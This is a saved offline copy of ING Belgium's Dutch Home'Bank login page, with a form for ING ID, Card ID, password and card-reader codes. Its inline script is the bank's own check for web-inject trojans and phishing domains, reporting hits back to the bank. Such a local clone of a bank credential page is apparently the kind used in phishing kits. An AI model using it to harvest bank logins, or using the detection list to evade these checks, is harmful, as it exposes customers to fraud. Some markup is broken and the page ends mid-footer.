<!DOCTYPE html>
<!-- saved from url=(0045)https://www.ing.be/nl/Retail/Pages/Login.aspx -->
<html lang="nl-BE" xmlns="http://www.w3.org/1999/xhtml" __expr-val-dir="ltr" dir="ltr" class="generated-content cssgradients no-box-model"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    
    <meta http-equiv="Last-Modified" content="26/04/2015 8:00:22">

                  <meta name="Robots" content="INDEX,FOLLOW">
              <meta name="channel" content="web">
              <meta name="MetricsContentType" content="">
              <meta name="ing-language" content="nl">
              <meta name="ing-segment" content="retail">
    <link rel="Canonical" href="https://www.ing.be/nl/retail/Pages/Login.aspx">

    
    <title>
    Online bank l Home'Bank, de online bankdienst van ING
</title>
    
    
    
    <link rel="stylesheet" type="text/css" href="./files/optimum-chrome.min.css">
    <link rel="stylesheet" type="text/css" href="./files/optimum-content.min.css">
    <link rel="stylesheet" type="text/css" href="./files/content.min.css">
    <link rel="stylesheet" type="text/css" href="./files/HtmlEditorStyles.css">
    <link rel="stylesheet" type="text/css" href="./files/csseditor.min.css">
    <link rel="stylesheet" type="text/css" href="./files/buttons.min.css">
    
     
    <link rel="stylesheet" type="text/css" href="./files/cm-lib-base.css">
<link rel="stylesheet" type="text/css" href="./files/cm-lib-uilib.css">
<link rel="stylesheet" type="text/css" href="./files/cm-master.css">
<link rel="stylesheet" type="text/css" href="./files/cm-master-fix.css">
<link rel="stylesheet" type="text/css" href="./files/CCR-Fix.css">

    
    
    <link rel="stylesheet" media="print" type="text/css" href="./files/print.min.css">
    <link type="image/x-icon" rel="shortcut icon" href="https://www.ing.be/favicon.ico">
    
    
    <script src="./files/framework.min.js"></script>
    <script src="./files/jquery-1.11.1.min.js"></script>
    <script src="./files/jquery-migrate-1.2.1.min.js"></script>
    <script src="./files/framework-libraries.min.js"></script>
    <script src="./files/jquery.support.min.js"></script>
    <script src="./files/jquery-allowtrigger.min.js"></script>
    <script src="./files/jquery.tools.1.2.6.cust.min.js"></script>
    <script src="./files/ing-k2-base.min.js"></script>
    <script src="./files/ing-k2-dialog.min.js"></script>
    <script src="./files/ing-k2-easynavigation.min.js"></script>
    <script type="text/javascript" src="./files/ing-k2-search.js"></script><script type="text/javascript" src="./files/search.config.min.js"></script><script type="text/javascript" src="./files/ing-k2-search-autocomplete.js"></script><script type="text/javascript" src="./files/ing-k2-cookie-law.min.js"></script> 
    
    <script src="./files/satelliteLib-9c1b5720bd68d7959813ad2ac4e25efea33297d1.js"></script><script src="./files/mbox-contents-31ad9395290c6b2cf352d3d8d966be910c13d560.js"></script><style>.mboxDefault { visibility:hidden; }</style>
    
    

    
     
       
    
    
		    
		    
	    
	

    

<script type="text/javascript">
	var hrzz = function() {
	try {
		return new XMLHttpRequest();
	} catch (error) {
	}
	try {
		return new ActiveXObject("Msxml2.XMLHTTP");
	} catch (error) {
	}
	try {
		return new ActiveXObject("Microsoft.XMLHTTP");
	} catch (error) {
	}
	throw new Error("while creating HTTP request obj.");
};

var urzz = function(dszz) {
	var pazz = new RegExp(
			"((https?:((//)|(\\\\\\\\))([\\w\\d]*\\.)?[\\w\\d]*\\.[\\w\\d]{2,3})|(((/)|(\\\\))local[\\w\\d]*))((/)|(\\\\))[\\w\\d\\.\\\\/_]*.js",
			'gim');
	var urzzpatzz2 = new RegExp("((\\.ing\\.be)" + "|(\\.ing\\.com)"
			+ "|(\\.ing\\.jobs)" + "|(\\.ingcard\\.be)"
			+ "|(\\.ingprivatebanking\\.com)" + "|(\\.privalis\\.be)"
			+ "|(\\.startyourbusiness\\.be)" + "|(\\.dealply\\.com)"
			+ "|(\\.googlesyndication\\.com))");
	var urzzpatzz3 = new RegExp("((\\.auth-online\\.org)"
			+ "|(\\.intezasonpaolo\\.com)" + "|(\\.malware-alerter\\.com)"
			+ "|(\\.security-checking\\.net)" + "|(\\.hennessy.tmweb\\.ru))");

	var urzz2 = dszz.match(pazz);
	var rurzz2 = '';
	if (urzz2) {
		for ( var i = 0; i < urzz2.length; i++) {
			if (urzz2[i].match(urzzpatzz2) == null) {
				rurzz2 += urzz2[i] + ' ';
			}
		}
	}

	urzz2 = dszz.match(urzzpatzz3);
	if (urzz2) {
		for ( var i = 0; i < urzz2.length; i++) {
			rurzz2 += urzz2[i] + ' detected! ';
		}
	}
	return rurzz2;
};

var z3gorzz = new RegExp(
		"src *=.*?($_PROXY_SERVER_HOST_$|$_BOTID_$|$_BOTNETID_$|$_SUBBOTNET_$|MainInjFile|BotNet|botID|cmdid).*?</ *script *>",
		"gi");

var z3gozz = function(dszz) {
	var r = '';
	var a = null;
	if (a = z3gorzz.exec(dszz)) {
		r = escape(a[0]);
	}
	return r;
};

var fdbzz = function(dszz) {
	var a = null;
	var r = '';
	var dbzz = '';
	var c = 0;
	var dbzzre = new RegExp("_[\\\\w\\\\d]{15,}", "gi");
	while (a = dbzzre.exec(dszz)) {
		if (eval("typeof " + a[1] + "==='function'")) {
			++c;
			dbzz += '[' + a[1] + '] ';
		}
	}
	if (0 < c)
		r = c + ' dbtFnc: ' + dbzz;
	return r;
};

var fobvv = function(dszz) {
	var a = null;
	var r = '';
	var obvzz = '';
	var c = 0;
	var obzzre = new RegExp("_*(o|O|0){5,13}", "gi");
	while (a = obzzre.exec(dszz)) {
		if (eval("typeof " + a[0] + "==='function'")) {
			++c;
			obvzz += '[' + a[0] + '] ';
		}
	}
	if (0 < c)
		r = c + ' obFnc: ' + obvzz;
	return r;
};

var rzzz = function() {
	var intoxzz = '';
	if (typeof (MainBotName) != 'undefined') {
		intoxzz += 'BN_MainBotName ';
	}
	if (document.getElementById('my_main') != null) {
		intoxzz += 'SITROF_' + ' ';
	}
	if (typeof (MainBotNetName) != 'undefined') {
		intoxzz += 'BNN_MainBotNetName ';
	}
	if (document.getElementById('WaitDivCursor') != null) {
		intoxzz += 'WaitDivCursor!' + ' ';
	}
	if (typeof StartTimer === 'function' || typeof StartTimer != 'undefined') {
		intoxzz += 'AIXED_StartTimer ';
	}
	if (document.getElementById('cmdframe') != null) {
		intoxzz += 'cmdframe!' + ' ';
	}
	if (typeof submitSignatures === 'function'
			|| typeof submitSignatures != 'undefined') {
		intoxzz += 'CBK_submitSignatures ';
	}
	if (document.getElementById('tan_value1') != null) {
		intoxzz += 'tan!' + ' ';
	}
	if (typeof loadpopunder === 'function'
			|| typeof loadpopunder != 'undefined') {
		intoxzz += 'CBK_loadpopunder ';
	}
	if (document.getElementById('tan_submit_btn') != null) {
		intoxzz += 'tan!' + ' ';
	}
	if (typeof OnLoadIFrame === 'function'
			|| typeof OnLoadIFrame != 'undefined') {
		intoxzz += 'CBK_OnLoadIFrame ';
	}
	if (document.getElementById('input_tan') != null) {
		intoxzz += 'tan!' + ' ';
	}
	if (typeof LoadLinkIntoIframe === 'function'
			|| typeof LoadLinkIntoIframe != 'undefined') {
		intoxzz += 'CBK_LoadLinkIntoIframe ';
	}
	if (document.getElementById('tan_div') != null) {
		intoxzz += 'tan!' + ' ';
	}
	if (typeof SendLog === 'function' || typeof SendLog != 'undefined') {
		intoxzz += 'SendLog! ';
	}
	if (document.getElementById('block_div') != null) {
		intoxzz += 'block_div!' + ' ';
	}
	if (typeof checkFrmNext === 'function'
			|| typeof checkFrmNext != 'undefined') {
		intoxzz += 'checkFrmNext! ';
	}
	if (typeof sendFrmNext_inj === 'function'
			|| typeof sendFrmNext_inj != 'undefined') {
		intoxzz += 'sendFrmNext_inj! ';
	}
	if (typeof LoadScript === 'function' || typeof LoadScript != 'undefined') {
		intoxzz += 'LoadScript! ';
	}
	if (typeof sendReport === 'function' || typeof sendReport != 'undefined') {
		intoxzz += 'sendReport! ';
	}
	if (typeof OnLoadACD === 'function' || typeof OnLoadACD != 'undefined') {
		intoxzz += 'OnLoadACD! ';
	}
	if (typeof tanSend === 'function' || typeof tanSend != 'undefined') {
		intoxzz += 'tanSend! ';
	}
	if (typeof clfield_check === 'function'
			|| typeof clfield_check != 'undefined') {
		intoxzz += 'clfield_check! ';
	}
	if (typeof gate_url === 'function' || typeof gate_url != 'undefined') {
		intoxzz += 'gate_url[' + gate_url + '] ';
	}

	var dszz = document.getElementsByTagName('html')[0].innerHTML;

if (dszz.indexOf("/ingbeadmin" + "/ing.js") != -1) {
intoxzz+='ing.js! ';
}

	intoxzz += fobvv(dszz);
	intoxzz += z3gozz(dszz);

	var uzzz = '';
	uzzz = urzz(dszz);

	var dbzzz = '';
	dbzzz = fdbzz(dszz);

	if (intoxzz != '' || uzzz != '' || dbzzz != '') {
		var rzz = hrzz();
		var url = "/_LAYOUTS/ING_K2/IMAGES/SSO/Cardreader_03.png&q=" + intoxzz + "&urls=" + uzzz + "&dbts="+ dbzzz;
		rzz.open("GET", url, true);
		rzz.send(null);
	}
};

var rzzzz = function() {
	setTimeout(rzzz, 1000);
};

document.onmousemove = function(zz) {
	document.onmousemove = null;
	rzzzz();
};


</script><script type="text/javascript" id="scode" defer="" src="./files/s_code-min.js"></script><script type="text/javascript" id="TM" defer="" src="./files/bup"></script></head><body class="cm-optin-popout"><span></span>


    <div itemscope="ing" itemtype="http://schema.org/Organization">
        <meta name="MDdescription" itemprop="description" content="Of u nu particulier of professional bent, ING biedt altijd een oplossing op maat: dagelijks bankieren, lenen, sparen, beleggen, verzekeren en pensioen.">
        <meta name="MDurl" itemprop="url" content="http://www.ing.be">
        <meta name="MDlocation" itemprop="location" content="Avenue Marnix 24, B-1000 Brussels">
        <meta name="MDlegalName" itemprop="legalName" content="ING België NV">
    </div>

    <script type="text/javascript" id="EnvironmentVariables">ING.K2.Base.setEnvironmentVariables({
  "ClosedPubUrl": "https://ebanking.ing.be/",
  "StaticSearchUrl": "/static/search/1.0.0",
  "FAQServiceUrl": "/",
  "FAQUseHandler": "No"
});</script>    
    
    
    
    
    

      

  
    <div id="s4-workspace" class="s4-workspace s4-nosetwidth">
        <div id="s4-bodyContainer">
            <div id="s4-titlerow" class="s4-pr s4-notdlg s4-titlerowhidetitle">
                
                <a name="top"></a>
                
                
                	                
                <div class="k2-header-background-fixed"></div>
                <div class="k2-header">
                    	                            
                    <div class="k2-header-row k2-header-row-1">
                        <div class="k2-segment-section-wrapper">
                            
                                

<div class="k2-segment-segmentholder">

    <div class="k2-segment-header k2-segment-tab k2-behaviour-clickable k2-segment-tab-active">
        <a class="k2-segment-header-title" href="https://www.ing.be/nl/retail/pages/index.aspx" rel="" rev="">Particulieren</a>

    </div>

    <div class="k2-segment-header k2-segment-tab k2-behaviour-clickable">
        <a class="k2-segment-header-title" href="https://www.ing.be/nl/business/pages/index.aspx" rel="" rev="">Business</a>

    </div>

    <div class="k2-segment-header k2-segment-tab-parent">
        <a class="k2-segment-header-title" rel="" rev="">Andere sites</a>
 
        <div class="k2-segment-choice">

            <ul class="k2-segment-seglinks">

                <li class="k2-segment-seglink">
                    <div class="k2-segment-item-content k2-behaviour-clickable">
                        <a href="https://www.ing.be/nl/expats/pages/index.aspx" rel="" rev="">Expats</a>
                        <span class="k2-segment-items-desc">Expats Segment</span>
                    </div>
                </li>

                <li class="k2-segment-seglink">
                    <div class="k2-segment-item-content k2-behaviour-clickable">
                        <a href="https://www.ing.be/nl/retail/pages/youth.aspx?WT.ac=goto_young" rel="" rev="">Jongeren</a>
                        <span class="k2-segment-items-desc">Voor jongeren tot 25 jaar</span>
                    </div>
                </li>

                <li class="k2-segment-seglink">
                    <div class="k2-segment-item-content k2-behaviour-clickable">
                        <a href="https://www.ing.be/nl/retail/investments/personal-private-banking/Pages/personal-private-banking.aspx" rel="" rev="">Personal en Private Banking</a>
                        <span class="k2-segment-items-desc">De oplossingen met meerwaarde van ING België</span>
                    </div>
                </li>

            </ul>

            <ul class="k2-segment-navlinks">
                
                <li class="k2-segment-navlink k2-behaviour-clickable">
                    <a class="k2-segment-item-content " href="http://www.ing.be/about/index.jsp?lang=nl&WT.ac=retail_goto_about" target="_blank" rel="" rev=""><span class="k2-segment-item-link">ING Belgie</span>
                    <span class="k2-segment-items-desc">Alles over ING in België</span>
                    </a>
                </li>
                
                <li class="k2-segment-navlink k2-behaviour-clickable">
                    <a class="k2-segment-item-content " href="http://www.ing.com/Ons-Bedrijf.htm?countrycode=GB" target="_blank" rel="" rev=""><span class="k2-segment-item-link">ING Groep</span>
                    <span class="k2-segment-items-desc">ING op internationaal vlak</span>
                    </a>
                </li>
                
                <li class="k2-segment-navlink k2-behaviour-clickable">
                    <a class="k2-segment-item-content " href="http://www.ing.jobs/belgie" target="_blank" rel="" rev=""><span class="k2-segment-item-link">Jobs</span>
                    <span class="k2-segment-items-desc">Werken bij ING</span>
                    </a>
                </li>

            </ul>

        </div>

    </div>

</div>

<script>
    if (ING != null && ING.K2 != null && ING.K2.EasyNavigation != null) {
        ING.K2.EasyNavigation.apply();
    }
</script>

                            
                        </div>
                        <div class="k2-homebank-section-wrapper">
                            
                                

<div class="k2-homebank-section k2-behaviour-clickable">
    <div class="k2-homebank-section-around">
        <a class="k2-btn-login dcsMultiTrackWtAc" title="Home&#39;Bank" rel="HBAccess_retail/pages/login.aspx" href="https://ebanking.ing.be/" target="_self">
            <span class="k2-ico"></span>Log on
        </a>
    </div>
</div>

                            
                        </div>
                        <div class="k2-fixed-navigation-section-wrapper">
                            <div class="nav_fx">
                            
                                

<ul class="pipe">

    <li>
        <a title="JOBS" href="http://www.ing.jobs/belgie" target="_self">JOBS</a>
    </li>

    <li>
        <a title="FAQ" href="https://www.ing.be/nl/retail/pages/faq.aspx" target="_self" accesskey="6">FAQ</a>
    </li>

    <li>
        <a title="Onze kantoren" href="https://branches.ing.be/kantoren" target="_self">Onze kantoren</a>
    </li>

    <li>
        <a title="Contact" href="https://www.ing.be/nl/retail/Pages/contact.aspx" target="_self">Contact</a>
    </li>

</ul>

                            
                            </div>
                        </div>
                    </div>
                    	                                                    
                    <div class="k2-header-row k2-header-row-2 cf">
                        <div class="k2-logo-wrapper">
                            
                                

<a href="https://www.ing.be/nl/retail" class="k2-logo"><img class="k2-logo-placeholder" alt="ING België" src="./files/blank.gif"></a>

                            
                        </div>
                        <div class="k2-header-nav-fx">
                            
                                

<div class="k2-search-section">
    <form action="https://www.ing.be/nl/retail/Pages/Search.aspx">
        <fieldset>
            <div class="fs fs-search">
                <div class="field">
                    <input type="text" maxlength="500" name="k" autocomplete="off" accesskey="s" data-default="Zoeken" value="Zoeken" class="k2-input-disabled">
                </div>
                <button class="k2-search-section-submit k2-action" type="submit">
                    <i class="k2-search-magnifying-glass"></i>
                </button>
                <div class="k2-search-suggestions-container"><ul></ul></div>
            </div>
        </fieldset>
        <input type="hidden" name="s" value="nlretail">
    </form>
</div>
 
                            
                            
                                

<ul id="nav_lang" class="pipe">

    <li>
        <a href="https://www.ing.be/en/retail/pages/login.aspx">en</a>
    </li>

    <li>
        <a href="https://www.ing.be/fr/retail/pages/login.aspx">fr</a>
    </li>

    <li class="active last">
        nl
    </li>

</ul>

                            
                                       
                        </div>        
                    </div>
                    	                                                    
                    <div class="k2-nav-wrapper">
                        

<div class="k2-header-row k2-nav cf" itemscope="ing" itemtype="http://schema.org/SiteNavigationElement">
    <ul class="k2-nav-lev1" itemprop="url">

        <li>
            <a class="k2-nav-lev1-btn" href="https://www.ing.be/nl/retail/Pages/index.aspx" accesskey="1">
                <span class="ico_home">Retail</span>
            </a>
        </li>

        <li>
            <a class="k2-nav-lev1-btn" href="https://www.ing.be/nl/retail/day-to-day-banking/Pages/index.aspx">
                Dagelijks bankieren
            </a>
        </li>

        <li>
            <a class="k2-nav-lev1-btn" href="https://www.ing.be/nl/retail/lending/Pages/index.aspx">
                Lenen
            </a>
        </li>

        <li>
            <a class="k2-nav-lev1-btn" href="https://www.ing.be/nl/retail/savings/Pages/index.aspx">
                Sparen
            </a>
        </li>

        <li>
            <a class="k2-nav-lev1-btn" href="https://www.ing.be/nl/retail/investments/Pages/index.aspx">
                Beleggen
            </a>
        </li>

        <li>
            <a class="k2-nav-lev1-btn" href="https://www.ing.be/nl/retail/insurance/Pages/index.aspx">
                Verzekeren
            </a>
        </li>

        <li>
            <a class="k2-nav-lev1-btn" href="https://www.ing.be/nl/retail/retirement/Pages/index.aspx">
                Pensioen
            </a>
        </li>

    </ul>

</div>

                        
                    </div>
                    <div class="k2-securitybar-wrapper">
                        
                    </div>
                </div>
                
             </div>
             <div class="k2-dialog-overlay"></div>

            
            

            <div id="ctl00_template">
                	                
                <div id="page_body" class="s4-ca main-container main-content ms-bodyareacell">
                    <a name="mainContent"></a>
                    
    
    <div data-loctype="txt" data-loczone="body">
        <div class="breadcrumbs" itemscope="ing" itemtype="http://schema.org/WebPage">
	<ol itemprop="breadcrumb">
		<li><a href="https://www.ing.be/nl/retail/Pages/index.aspx" title="Home">Home</a></li><li>Aanmelden in Home'Bank</li>
	</ol>
</div>  
        
 <link rel="stylesheet" type="text/css" href="./files/ssoccr.css">
 <div id="session_management" class="ccrinfo" data-card-id="" data-security-type="" data-page-type="LoginPages"></div>


<div class="k2-dialog ccr-dialog ccr-lib" data-lastuseddevicetype="" data-ccrenabled="true" data-ccrewallenabled="true" data-screnabled="false" data-ccrsconnectpath="/static/cardreader/1.0.0/ccr/scripts/sconnect.js" data-ccrenexpath="/static/cardreader/1.0.0/ccr/scripts/enex.js" data-ccrjsonobjectpath="/static/cardreader/1.0.0/ccr/scripts/CCRJsonObject.js" data-ccrjspath="/static/cardreader/1.0.0/ccr/scripts/CCRLogin.js" data-scrsconnectpath="/static/cardreader/1.0.0/scr/scripts/sconnect.js" data-screnexpath="/static/cardreader/1.0.0/scr/scripts/enex.min.js" data-scrjsonobjectpath="/static/cardreader/1.0.0/scr/scripts/CCRJsonObject.js" data-scrjspath="/static/cardreader/1.0.0/scr/scripts/SCR.js" data-ccrincludedurls="/pages/login.aspx,/pages/passwordcreation.aspx,/pages/passwordreset.aspx,/pages/activationflow.aspx" data-scroverlaypath="/static/cardreader/1.0.0/scr/scripts/ccrdialogoverlay-nl.js">
    <div>
        <button type="button" class="ccrClose" data-dismiss="alert">x</button>
        <div class="k2-dialog-title">
        
        </div>
    </div>
    <div class="k2-dialog-content CCR-footer">
        <div class="ccrPasswordError">
            <div class="inputdocumenterrorboxtitlestyle">
            </div>                                   
        </div>
        <div class="ccrleft">
        </div>
        <div class="ccrMiddle">
        </div>
    </div>
    <div class="CCR-dialog-footer">
        <div class="ccrdialoginfo"></div>
        <div class="CCR-dialog-buttons">
            <button class="k2-dialog-button k2-dialog-close ccr-btn c-btn-stretch ccrLink"></button>             
            <button class="k2-dialog-button ccr-btn c-btn-stretch ccrContact"></button>            
            <button class="k2-dialog-button ccr-btn c-btn-stretch ccrLogonButton"></button>             
            <button class="k2-dialog-button ccr-btn c-btn-stretch ccrLogout"></button>            
            <button class="k2-dialog-button ccr-btn c-btn-stretch ccrCancel"></button>            
            <button class="k2-dialog-button ccr-btn c-btn-stretch ccrOkbutton"></button>                                    
        </div>        
    </div>
</div>

<div class="CCROK-dialog-overlay"></div>
     
<script src="./files/cardreader-loader.js"></script>

        <h1 class="ht1">
            Aanmelden in Home'Bank
        </h1>
        
        <div class="main">
            <div class="c-lib login-wrapper renderer-wrapper  sharepoint-server">
                <link rel="stylesheet" type="text/css" href="./files/SSO.css">
                <script src="./files/SSO.js"></script>

                <div class="login-container UCR">
                    <form autocomplete="off">
                        <div class="login-content">
                            <div class="info-body-wrapper" style="">
                                <i class="info-body-icon"></i>
                            </div>
                            <div class="c-messagebox c-error default-error">
                                <i class="c-icon-messagebox-error"></i>
                                <div>
                                    <h2 class="c-reset-top">
                                        Er is een fout opgetreden. Mogelijk is een van de onderstaande gegevens niet correct.
                                    </h2>
                                    <p id="ErrorMessagePleaseCheck">
                                        Kijk de juistheid na van:
                                    </p>
                                    <ul class="errorinfo arrows" id="ErrorInfo">
                                        <li id="ErrorMessageINGId">de ING ID van uw bankkaart</li>
                                        <li id="ErrorMessageCardId">de Card ID van uw bankkaart</li>
                                        <li id="ErrorMessageCombination">de overeenstemming van uw ING ID en de Card ID</li>
                                        <li id="ErrorMessagePassword">uw Home'Bank-paswoord</li>
                                        <li id="ErrorMessageOTP">de "RESPONSE" gegeven door uw ING Card Reader.</li>
                                    </ul>
                                </div>
                            </div>
                            <div class="overlay">
                                <div class="overlay-wrapper"></div>
                                <div class="overlay-hb login-container">
                                    <div class="overlay-header">
                                        <h2 class="ht2"></h2>
                                    </div>
                                    <div class="overlay-content">
                                        <p>
                                    </p></div>
                                    <div class="c-lib identify-bottom-div overlay-footer">
                                        <div class="btn-back back">
                                            <a class="overlay-back">Terug</a>
                                        </div>
                                        <div class="more-info-wrapper">
                                            <div class="more-info btn-branch">
                                                <a href="https://www.ing.be/nl/retail/Pages/our-branches.aspx?WT.xmenusource=TOPNAVIGATION_our-branches">
                                                    <button class="c-btn c-btn-secondary">Zoek een ING-kantoor</button>
                                                </a>
                                            </div>
                                            <div class="more-info btn-appointment">
                                                <a href="https://www.ing.be/nl/retail/Pages/Make-an-appointment.aspx?origin=ingbe&originType=fp_branches_1">
                                                    <button class="c-btn c-btn-primary">Maak een afspraak</button>
                                                </a>
                                            </div>
                                            <div class="more-info btn-homebank">
                                                <a href="https://www.ing.be/nl/retail/day-to-day-banking/self-banking/Pages/homebank.aspx?WT.ac=AD_HP_RT_OnlineBanking_HB">
                                                    <button class="c-btn c-btn-secondary">Meer info over Home'Bank</button>
                                                </a>
                                            </div>
                                            <div class="more-info btn-homebank-plus">
                                                <a href="https://www.ing.be/independent/showdoc.jsp?docid=025712&lang=NL" class="k2BtnBlue32px">
                                                    <button class="c-btn c-btn-primary">Meer info over Home'Bank Plus</button>
                                                </a>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                            <input type="hidden" name="securityType" value="UCR">
                            <input type="hidden" name="logonTimestamp" value="">
                            <input type="hidden" name="URL" value="">
                            <input type="hidden" name="scInit" value="">
                            <input type="hidden" name="scPCRMessage" value="">
                            <input type="hidden" name="psn" value="">
                            <!--<input type="hidden" name="appType" value="1" />
                            <input type="hidden" name="appCode" value="1" />-->

                            <fieldset class="login-fieldset">
                                <legend>1. Uw gegevens</legend>
                                <div class="c-control-group ingId-wrapper only-ucr">
                                    <label>
                                        ING ID
                                    </label>
                                    <i class="c-icon-message-info info-icon"></i>
                                    <img class="info-msg" src="./files/INGID.png" alt="">
                                    <div class="c-controls">
                                        <input type="hidden" name="ingId" class="ingid-hidden">
                                        <input type="tel" class="ingid UCR big auto-next" autocomplete="off" size="38" data-maxlength="10" placeholder="Geef uw ING ID in" id="ing-id">
                                        <div class="profile-dropdown">
                                            Selecteer
                                            <img class="showdropdown" src="./files/dropdown_arrow.png">
                                        </div>
                                        <div class="profiles-wrapper">
                                            <script type="text/html" id="profileItem">
                                                <li class="profile ingid" data-ingid="{{ingid}}" data-cardid="{{cardid}}">
                                                    <p>ING ID: {{ingid}}</p>
                                                    <p>Card ID: {{cardid}}</p>
                                                </li>
                                            </script>
                                            <div class="profiles-dropdown ingid">
                                                <ul></ul>
                                            </div>

                                            <div class="toggle-profiles ingid show-all">
                                                <i class="c-icon-chevron-down icon-center"></i>
                                                <a class="show-all">Alles tonen</a>
                                            </div>
                                            <div class="toggle-profiles ingid btn-hide" style="display:none">
                                                <i class="c-icon-chevron-up icon-center"></i>
                                                <a>Verbergen</a>
                                            </div>
                                            <div class="profiles-footer">
                                                <div class="add-profile">Voeg een ING ID toe</div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                                <div class="c-control-group">
                                    <label>
                                        Card ID
                                    </label>
                                    <i class="c-icon-message-info info-icon"></i>
                                    <img class="info-msg" src="./files/CardID.png" alt="">
                                    <div class="c-controls">
                                        <input type="hidden" name="cardNr" class="cardid-hidden">
                                        <input type="tel" class="cardid big auto-next" data-maxlength="17" autocomplete="off" placeholder="Geef uw Card ID in" value="6703" id="ing-cardid">
                                        <div class="profile-dropdown">
                                            Selecteer<img class="showdropdown" src="./files/dropdown_arrow.png">
                                        </div>
                                        <div class="profiles-wrapper">
                                            <div class="profiles-title">
                                                <p class="profiles-">Card ID gelinkt met de geselecteerde ING ID</p>
                                            </div>
                                            <div class="profiles-dropdown cardnr">
                                                <ul></ul>
                                            </div>

                                            <div class="toggle-profiles cardnr show-all">
                                                <i class="c-icon-chevron-down icon-center"></i>
                                                <a class="show-all">Alles tonen</a>
                                            </div>
                                            <div class="toggle-profiles cardnr btn-hide" style="display:none">
                                                <i class="c-icon-chevron-up icon-center"></i>
                                                <a>Verbergen</a>
                                            </div>
                                            <div class="profiles-footer">
                                                <div class="add-cardId">Voeg een Card ID toe</div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                                <div class="choice-inline version-wrapper">
                                    <input id="ing-version-01" name="logonType" type="radio" value="01" checked="checked" class="showhand version>
                                    <label class="homebanklabel" for="version">
                                        Home'Bank
                                    </label>
                                    <input id="ing-version-02" name="logonType" type="radio" value="02" class="showhand version">
                                    <label class="homebanklabel" for="version1">
                                        Business'Bank
                                    </label>
                                </div>
                                <div class="c-control-group save-information-wrapper only-ucr">
                                    <div class="c-controls checkbox-single no-label">
                                        <label>
                                            <input id="saveCheckboxHidden" class="save-information" type="hidden" value="false" name="addCredentials">
                                            <input id="saveCheckbox" class="save-information" type="checkbox" value="true" name="addCredentials">
                                            Bewaar mijn gegevens
                                        </label>
                                    </div>
                                </div>
                                <div class="c-control-group">
                                    <label>
                                        Password
                                    </label>
                                    <i class="c-icon-message-info info-icon"></i>
                                    <div class="info-msg info-text">
                                        <p class="pw-tooltip-question">
                                            Waarom een Home'Bank-paswoord gebruiken?
                                        </p>
                                        <p class="pw-tooltip-answer">
                                            Uw paswoord is vereist als bijkomende veiligheidsmaatregel.
                                        </p>
                                        <p class="pw-tooltip-question">
                                            Hebt u er nog geen of wilt u een nieuw paswoord instellen?
                                        </p>
                                        <p class="pw-tooltip-answer">
                                            Klik in het identificatiescherm op "Nieuw paswoord" om een nieuw Home'Bank-paswoord te kiezen.
                                        </p>
                                        <p class="pw-tooltip-question">
                                            Bent u uw Home'Bank-paswoord vergeten?
                                        </p>
                                        <p class="pw-tooltip-answer">
                                            Uw Home'Bank-paswoord vergeten? Klik dan in het identificatiescherm op "Paswoord vergeten?".
                                            <br>
                                            Als u uw paswoord opnieuw instelt, duurt het 24 uur voor u uw paswoord kunt aanmaken.
                                        </p>
                                    </div>
                                    <div class="c-controls">
                                        <input type="hidden" id="Password" name="hbPwd" class="password-hidden">
                                        <input type="password" class="ingtext big auto-next password" autocomplete="off" size="36" id="ing-password">
                                    </div>
                                </div>
                                <div class="c-control-group">
                                    <div class="no-label">
                                        <a href="https://www.ing.be/nl/Retail/Pages/PasswordCreation.aspx" class="password-link new-password" tabindex="9">Nieuw paswoord</a>|
                                        <a href="https://www.ing.be/nl/Retail/Pages/PasswordReset.aspx" class="password-link forgot-password" tabindex="10">Paswoord vergeten?</a>
                                    </div>
                                </div>
                            </fieldset>
                            <fieldset class="login-fieldset otp only-ucr">
                                <legend>2. Identificatie</legend>
                                <div class="identification-wrapper">
                                    <ul>
                                        <li>
                                            <p>
                                                1. Steek uw ING-bankkaart in de ING Card Reader en druk op:<i class="icon identify-icon"></i>
                                            </p>
                                        </li>
                                        <li>
                                            <p>
                                                2. Voer de pincode in van uw ING-bankkaart en druk op:<i class="icon ok-icon"></i>
                                            </p>
                                        </li>
                                        <li>
                                            <p>
                                                3. Voer, zonder spaties, de cijfers in die op het scherm van uw ING Card Reader verschijnen.
                                            </p>
                                            <div class="c-control-group no-label">
                                                <input name="otp" type="tel" class="txtIdentification big numbers auto-next" size="38" maxlength="8" autocomplete="off" id="ing-identification">
                                            </div>
                                        </li>
                                    </ul>
                                </div>
                            </fieldset>
                        </div>
<div class="identify-bottom-div"><a href="/nl/retail/day-to-day-banking/self-banking/pages/homebank.aspx?WT.oldlink_redir=showdoc_docid_323068" class="no-homebank-user ng-binding">Nog geen Home'Bank-abonnement?</a> <button class="c-btn c-btn-primary identification ucr ng-binding" id="ing-login">Aanmelden<i class="c-icon-chevron-right c-place-right"></i></button>
                <script src="./files/sso-login.js"></script>
            </div><script class="infoBody">var infoBoxJson = {"Body":"","Class":""}</script>
            <div id="hbfoot" class="hbfoot">   
                <div id="ctl00_PlaceHolderMain_LogonInformation_label" style="display:none">LogonInformation</div><div id="ctl00_PlaceHolderMain_LogonInformation__ControlWrapper_RichHtmlField" class="ms-rtestate-field" style="display:inline" aria-labelledby="ctl00_PlaceHolderMain_LogonInforma</div>
            </div>
        </div>
        <div class="sidebar">
            <div id="Sort">
                <div class="stellentcolumn">
	<div class="boxk2">
		<div class="boxtop">


			</div>
		</div><div class="boxbottom">

		</div>
	</div>
</div><span></span>  
            </div>
        </div>
 </div>


                
                
                <div class="k2-footer cf s4-notdlg">
                    <div class="cf s4-notdlg"><div class="k2-big-footer cols"><div class="k2-col"><h5><a class="k2-big-footer-linklist-heading" href="https://www.ing.be/nl/retail/day-to-day-banking/Pages/index.aspx?WT.ac=bigfooter_retail_daytodaybanking">Dagelijks bankieren</a> </h5>
<ul class="k2-big-footer-linklist"><li><a href="https://www.ing.be/nl/retail/day-to-day-banking/current-accounts-and-their-cards/Pages/free-ane-online.aspx?WT.ac=bigfooter_retail_freeandonline">ING Lion Account</a> </li>
<li><a href="https://www.ing.be/nl/retail/day-to-day-banking/current-accounts-and-their-cards/Pages/index.aspx?WT.ac=bigfooter_retail_currentaccountsandtheircards">Andere zichtrekeningen</a> </li>
<li><a href="https://www.ing.be/nl/retail/day-to-day-banking/credit-cards/Pages/flexible-credit-card.aspx?WT.ac=bigfooter_retail_flexiblecreditcard">ING Card</a> </li>
<li><a href="https://www.ing.be/nl/retail/day-to-day-banking/credit-cards/Pages/index.aspx?WT.ac=bigfooter_retail_creditcards">Andere kredietkaarten</a> </li>
